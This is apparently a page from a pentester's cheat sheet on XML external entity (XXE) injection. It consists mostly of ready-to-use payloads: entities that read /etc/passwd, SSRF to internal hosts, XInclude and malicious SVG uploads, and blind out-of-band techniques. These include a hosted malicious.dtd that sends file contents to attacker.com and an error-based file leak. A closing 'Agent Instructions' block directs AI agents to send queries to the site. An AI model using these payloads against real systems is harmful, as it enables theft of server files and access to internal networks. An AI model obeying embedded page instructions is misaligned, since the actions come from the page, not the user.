# XML external entity (XXE)

> An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.
>
> \-- [*Wikipedia*](https://en.wikipedia.org/wiki/XML_external_entity_attack)

* [PortSwigger - Web Security Academy - XML external entity (XXE) injection](https://portswigger.net/web-security/xxe)

Generally, XXE vulnerabilities arise when resolution of external entities and/or `XInclude` is enabled in the app/xml parser.

## Retrieve files

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE file [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<some><xml>&xxe;</xml></some>
```

## SSRF

```xml
<!DOCTYPE request [ <!ENTITY xxe SYSTEM "http://internal.website.com"> ]>
```

## XInclude

You may be able to use `XInlcude` when you don't have control over the `DOCTYPE` element, e.g. in SOAP requests.

```xml
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
```

## File uploads

Sometimes XML based files like SVG or DOCX can be uploaded and are then processed by the app.

E.g. [XML External Entity (XXE) Injection in Apache Batik Library \[CVE-2015-0250\]](https://insinuator.net/2015/03/xxe-injection-in-apache-batik-library-cve-2015-0250/)

```xml
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg width="500px" height="100px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
	<text font-family="Verdana" font-size="16" x="10" y="40">&xxe;
    </text>
</svg> 
```

## Blind XXE

You can use out-of-band (OAST) to detect blind XXE vulnerabilities (e.g. using Burp Collaborator).

```xml
<!DOCTYPE oast [ <!ENTITY xxe SYSTEM "https://attacker.com"> ]>
```

Via parameter entities:

```xml
<!DOCTYPE oast [ <!ENTITY % xxe SYSTEM "https://attacker.com"> %xxe; ]>
```

### Exfiltrate data

Create a `malicious.dtd` file, hosted on attacker controlled system:

```xml
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'https://attacker.com/?x=%file;'>">
%eval;
%exfiltrate;
```

XXE payload on target:

```xml
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://attacker.com/malicious.dtd"> %xxe;]>
```

### Retrieve data via error message

Create a `malicious.dtd` file, hosted on attacker controlled system:

```xml
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
```

XXE payload on target:

```xml
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://attacker.com/malicious.dtd"> %xxe;]>
```

## Modified content type

Some apps accept `text/xml` as content type of POST requests instead of e.g. `application/x-www-form-urlencoded`.\
If so, malicious XML can be send to and will be proccessed by the app and my be exploitable that way.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://d4rk1337.gitbook.io/the-pentesters-cheat-sheet/exploitation/web/xml-external-entity-injection.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.